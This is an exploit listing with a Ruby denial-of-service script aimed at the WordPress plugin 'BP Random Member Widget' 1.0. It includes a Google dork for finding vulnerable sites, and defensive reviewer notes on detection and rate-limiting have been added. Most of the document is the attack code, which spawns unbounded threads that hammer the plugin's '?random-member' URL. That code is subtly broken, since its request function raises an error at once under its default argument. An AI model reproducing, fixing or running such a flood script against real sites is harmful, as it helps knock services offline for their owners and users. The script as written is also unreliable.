# Exploit Title: Dos BP Random Member Widget Plugin WordPress
# Google Dork: allinurl: ?random-member
# Author: a01001100e@gmail.com
# Software Link: http://wordpress.org/extend/plugins/bp-random-member-widget/
# Version: BP Random Member Widget Version: 1.0
# Tested on: debian 2.6.32-5-686
#
# Reviewer notes (defensive reading of this listing):
# - The script starts an unbounded number of threads, each calling fetch on the
#   plugin's `?random-member` URL. The page does not say why that URL is costly
#   for the server; presumably each hit triggers server-side work in the plugin
#   (unverified).
# - Detection: a sustained burst of GET requests for `/members/?random-member`
#   from one client address in the web server access log.
# - Mitigation: rate-limit or block the `random-member` query parameter at the
#   reverse proxy / WAF, and deactivate the plugin if no fixed release is
#   available (the header names only version 1.0 as affected).
require 'net/http'
require 'uri'

# Performs a single GET against uri_str and reacts to the response class.
#
# @param uri_str [String] absolute URL to request
# @param limit [Integer] redirect budget; nothing in this method decrements it
# @return [nil, String] nil after printing the status code of a 2xx response,
#   or the response body when the server answered with a redirect
# @raise [ArgumentError] if limit is 0 (the default value)
# @raise [Net::HTTPExceptions-family error] via response.error! for any
#   response that is neither success nor redirect
def fetch(uri_str, limit = 0)
  if limit == 0
    raise ArgumentError, 'HTTP redirect too deep'
  end

  reply = Net::HTTP.get_response(URI.parse(uri_str))
  if reply.is_a?(Net::HTTPSuccess)
    print reply.code
  elsif reply.is_a?(Net::HTTPRedirection)
    # The redirect is not followed; the body is only captured in a local.
    body = reply.body
  else
    reply.error!
  end
end

# Start-up banner, written without any added separators.
[
  "############################\n",
  "## DOS random-member ##\n",
  "## @author: a01001100e ##\n",
  "############################\n\n\n\n"
].each { |banner_line| print banner_line }

# Endless loop: one new thread per iteration, never joined and never capped.
# The rescue below only covers Thread.new and the progress print in the main
# thread; exceptions raised inside a worker thread are not delivered here.
# `rescue Exception` also catches Interrupt and SystemExit raised inside the
# begin block, so the loop keeps running in those cases.
loop do
  begin
    worker = Thread.new { fetch('http://www.sitio.com/members/?random-member') }
    print "."
  rescue Exception => err
    print "Error: "
    puts err
  end
end